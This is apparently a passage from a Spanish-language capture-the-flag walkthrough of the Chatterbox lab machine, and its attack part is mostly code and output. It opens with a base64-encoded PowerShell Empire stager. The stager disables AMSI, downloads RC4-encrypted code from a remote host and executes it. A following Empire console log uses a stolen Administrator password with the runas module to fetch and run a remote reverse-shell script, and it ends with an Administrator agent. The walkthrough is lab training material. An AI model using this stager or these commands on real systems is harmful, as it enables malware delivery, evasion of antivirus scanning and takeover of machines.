BlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwALAAkAHQAcgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFMAZQBSAFYASQBjAEUAUABPAEkATgB0AE0AQQBuAEEAZwBlAHIAXQA6ADoARQBYAFAARQBjAHQAMQAwADAAQwBvAE4AdABJAG4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBFAGMAdAAgAFMAeQBTAHQARQBNAC4ATgBlAHQALgBXAGUAQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAQwAuAEgAZQBhAEQAZQByAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAeQA9AFsAUwB5AHMAVABFAE0ALgBOAEUAdAAuAFcAZQBCAFIARQBxAFUAZQBTAHQAXQA6ADoARABlAGYAQQB1AGwAVABXAGUAQgBQAFIAbwB4AHkAOwAkAFcAYwAuAFAAcgBvAHgAWQAuAEMAcgBlAGQARQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAWQBTAHQAZQBNAC4ATgBFAHQALgBDAHIARQBEAGUAbgBUAGkAQQBMAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAFUAbABUAE4ARQB0AHcAbwBSAEsAQwByAEUAZABlAG4AVABJAEEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABlAE0ALgBUAGUAeAB0AC4ARQBuAEMAbwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAWQB0AEUAUwAoACcAPgB5AG4AKwA1AEcAKQBrACoAJQAuADgALQBiADQAQgBGAFoAQwBTADsAfgAzAGMAOQAsAGEAWAAoAHcAZgA8ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA2ADoANAA0ADMAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBDAC4ASABFAEEAZABlAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ALwA4AHIAawBUAGUAbABBAEgAUABNAGcATwBWAHYAeABiADcAYgB2ADUAVQBlAHEATwBXAFkAPQAiACkAOwAkAEQAYQB0AGEAPQAkAFcAQwAuAEQAbwB3AG4AbABPAEEARABEAEEAdABBACgAJABTAEUAcgArACQAVAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAQQBUAGEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAFQAaABdADsALQBKAG8AaQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Podemos ejecutar otra vez el exploit pero cuando se conecte en vez de encontrar nishang vera a nuestro agent.

(Empire) > agents

[*] Active agents:

 Name 	La Internal IP 	Machine Name  	Username            	Process        	PID	Delay	Last Seen
 ---- 	-- ----------- 	------------  	--------            	-------        	---	-----	---------
 AF35EWGK ps 10.10.10.74 	CHATTERBOX    	CHATTERBOX\Alfred   	powershell     	28172  5/0.0	2019-10-26 10:23:47

(Empire: agents) > interact AF35EWGK
(Empire: AF35EWGK) > usemodule management/runas
(Empire: powershell/management/runas) > set Arguments "IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/powershellreverse.ps1')"
(Empire: powershell/management/runas) > info

          	Name: Invoke-RunAs
        	Module: powershell/management/runas
    	NeedsAdmin: False
     	OpsecSafe: True
      	Language: powershell
MinLanguageVersion: 2
    	Background: False
   OutputExtension: None

Authors:
  rvrsh3ll (@424f424f)

Description:
  Runas knockoff. Will bypass GPO path restrictions.

Comments:
  https://github.com/rvrsh3ll/Misc-Powershell-
  Scripts/blob/master/RunAs.ps1

Options:

  Name   	Required	Value                 	Description
  ----   	--------	-------               	-----------
  UserName   False   	Administrator         	Username to run the command as.    	 
  CredID 	False                             	CredID from the store to use.      	 
  Domain 	False   	CHATTERBOX            	Optional domain.                   	 
  Cmd    	True    	Powershell            	Command to run.                    	 
  Arguments  False   	"IEX(New-Object Net.webC  Optional arguments for the supplied	 
                     	lient).downloadString('h  binary.                            	 
                     	ttp://10.10.14.26/powers
                     	hellreverse.ps1')" 	 
  ShowWindow False                             	Switch. Show the window for the created
                                               	process instead of hiding it.      	 
  Password   False   	Welcome1!             	Password for the specified username.    
  Agent  	True    	AF35EWGK              	Agent to run module on.            	 

(Empire: powershell/management/runas) > execute
[*] Tasked AF35EWGK to run TASK_CMD_WAIT
[*] Agent AF35EWGK tasked with task ID 6
[*] Tasked agent AF35EWGK to run module powershell/management/runas
(Empire: powershell/management/runas) > [*] Agent AF35EWGK returned results.

Handles  NPM(K)	PM(K)  	WS(K) VM(M)   CPU(s) 	Id ProcessName     	 
-------  ------	-----  	----- -----   ------ 	-- -----------     	 
  	0   	1  	228     	84 	2 	0.02  28988 powershell      	 



[*] Valid results returned by 10.10.10.74
[*] Sending POWERSHELL stager (stage 1) to 10.10.10.74
[*] New agent 1CYPDXW6 checked in
[+] Initial agent 1CYPDXW6 from 10.10.10.74 now active (Slack)
[*] Sending agent (stage 2) to 1CYPDXW6 at 10.10.10.74

(Empire: powershell/management/runas)
(Empire: powershell/management/runas) > agents

[*] Active agents:

 Name 	La Internal IP 	Machine Name  	Username            	Process        	PID	Delay	Last Seen
 ---- 	-- ----------- 	------------  	--------            	-------        	---	-----	---------
 AF35EWGK ps 10.10.10.74 	CHATTERBOX    	CHATTERBOX\Alfred   	powershell     	28172  5/0.0	2019-10-26 10:25:14
 1CYPDXW6 ps 10.10.10.74 	CHATTERBOX    	*CHATTERBOX\Administrat powershell     	22764  5/0.0	2019-10-26 10:25:14

(Empire: agents) > interact 1CYPDXW6
(Empire: 1CYPDXW6) > whoami
[*] Tasked 1CYPDXW6 to run TASK_SHELL
[*] Agent 1CYPDXW6 tasked with task ID 1
(Empire: 1CYPDXW6) > [*] Agent 1CYPDXW6 returned results.
CHATTERBOX\Administrator
[*] Valid results returned by 10.10.10.74

Y listo tenemos un agente corriendo como admin con Empire 🤯